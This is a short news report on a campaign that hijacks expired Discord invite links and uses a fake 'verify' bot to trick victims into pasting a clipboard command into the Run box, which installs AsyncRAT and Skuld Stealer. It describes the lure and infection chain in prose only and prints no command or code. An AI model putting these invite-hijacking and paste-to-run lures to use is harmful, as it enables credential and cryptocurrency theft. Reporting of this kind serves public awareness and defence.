A novel threat campaign is leveraging a design flaw in the Discord invitation system to distribute AsyncRAT and a customized version of Skuld Stealer, both aimed at stealing cryptocurrency and sensitive user data.
The issue comes from how Discord lets users set up custom invites. When an invite link expires or gets deleted, it can still be re-used, so attackers scoop up old ones and attach them to their own fake servers. That way, people who click what used to be a trusted link end up somewhere dangerous.
Once there, victims are told to “verify” their identity through a fake bot. Clicking “verify” doesn’t do anything helpful but quietly copies a command to the clipboard. Victims are then told to paste it into their system’s Run box, thinking it’s part of the verification. Instead, it starts downloading malware.
Behind the scenes, this malware installs two programs. One gives attackers remote access, and the other goes hunting for crypto wallets and login credentials. It’s designed to grab info from browsers, games, and Discord itself.
Researchers say a similar version of the attack was also hidden in fake game tools that looked harmless at times. Victims have popped up in the U.S., Europe, and parts of Asia.
Discord has removed one of the malicious bots used, but the root of the issue, how expired invites can be re-used, still hasn’t been fixed.
